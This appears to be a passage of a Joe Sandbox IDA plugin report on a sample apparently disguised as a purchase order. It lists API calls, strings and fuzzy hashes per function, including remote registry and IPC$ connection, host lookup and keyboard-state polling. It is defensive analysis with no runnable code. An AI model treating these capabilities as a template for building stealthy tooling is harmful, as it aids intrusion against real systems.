                                        • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                        • API String ID: 3052893215-4176887700
                                        • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                        • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                        • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                        • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                        APIs
                                        • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                        • RegQueryValueExW.ADVAPI32 ref: 00458381
                                        • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                        • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                        • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                          • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                        • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                        • String ID: Version$\TypeLib$interface\
                                        • API String ID: 656856066-939221531
                                        • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                        • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                        • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                        • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                        APIs
                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                        • __swprintf.LIBCMT ref: 0045E6EE
                                        • _printf.LIBCMT ref: 0045E7A9
                                        • _printf.LIBCMT ref: 0045E7D2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: LoadString_printf$__swprintf_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 3590180749-2354261254
                                        • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                        • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                        • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                        • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                        APIs
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        • _memset.LIBCMT ref: 00458194
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                        • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 2255324689-22481851
                                        • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                        • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                        • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                        • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                        • RegCloseKey.ADVAPI32(?), ref: 00458615
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                        • __wcsicoll.LIBCMT ref: 004585D6
                                        • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                        • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                        • String ID: ($interface$interface\
                                        • API String ID: 2231185022-3327702407
                                        • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                        • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                        • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                        • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                        • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                        • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                        • _wcscpy.LIBCMT ref: 004365F5
                                        • WSACleanup.WSOCK32 ref: 004365FD
                                        • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                        • _strcat.LIBCMT ref: 0043662F
                                        • _wcscpy.LIBCMT ref: 00436644
                                        • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                        • _wcscpy.LIBCMT ref: 00436666
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 2691793716-3771769585
                                        • Opcode ID: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                        • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                        • Opcode Fuzzy Hash: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                        • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                        • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                          • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                          • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                        • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                        • __lock.LIBCMT ref: 00416B8A
                                        • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                        • __lock.LIBCMT ref: 00416BAB
                                        • ___addlocaleref.LIBCMT ref: 00416BC9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                        • API String ID: 1028249917-2843748187
                                        • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                        • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                        • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                        • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                        APIs
                                        • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                        • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                        • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                        • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                        • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$CharNext
                                        • String ID:
                                        • API String ID: 1350042424-0
                                        • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                        • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                        • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                        • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                        APIs
                                        • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                        • SetKeyboardState.USER32(?), ref: 00453C5A
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                        • GetKeyState.USER32(000000A0), ref: 00453C99
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                        • GetKeyState.USER32(000000A1), ref: 00453CDA
                                        • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                        • GetKeyState.USER32(00000011), ref: 00453D15
                                        • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                        • GetKeyState.USER32(00000012), ref: 00453D4D
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                        • GetKeyState.USER32(0000005B), ref: 00453D85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                        • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                        • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                        • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                        • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                        • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                        • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                        • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                        • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                        • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                        • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                        • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                        • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                        • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                        • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                        • String ID:
                                        • API String ID: 136442275-0
                                        • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                        • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                        • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                        • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ConnectRegistry_wcslen
                                        • String ID: HH
                                        • API String ID: 535477410-2761332787
                                        • Opcode ID: e91c6bd909ad74ed1928ed0244ed8aa8a8dc52ba60fb0b240039b69f8a910896
                                        • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                        • Opcode Fuzzy Hash: e91c6bd909ad74ed1928ed0244ed8aa8a8dc52ba60fb0b240039b69f8a910896
                                        • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                        • _wcslen.LIBCMT ref: 00460502
                                        • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                        • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                        • GetWindowRect.USER32(?,?), ref: 004606AD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                        • String ID: ThumbnailClass
                                        • API String ID: 4123061591-1241985126
                                        • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                        • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                        • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                        • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                        APIs
                                          • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                          • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                          • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                          • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                        • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                        • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                        • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                        • ReleaseCapture.USER32 ref: 0046F589
                                        • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                        • API String ID: 2483343779-2060113733
                                        • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                        • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                        • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                        • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                        APIs
                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                        • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                        • GetClientRect.USER32(?,?), ref: 0046FEF2
                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                        • DestroyIcon.USER32(?), ref: 0046FFCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                        • String ID: 2
                                        • API String ID: 1331449709-450215437
                                        • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                        • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
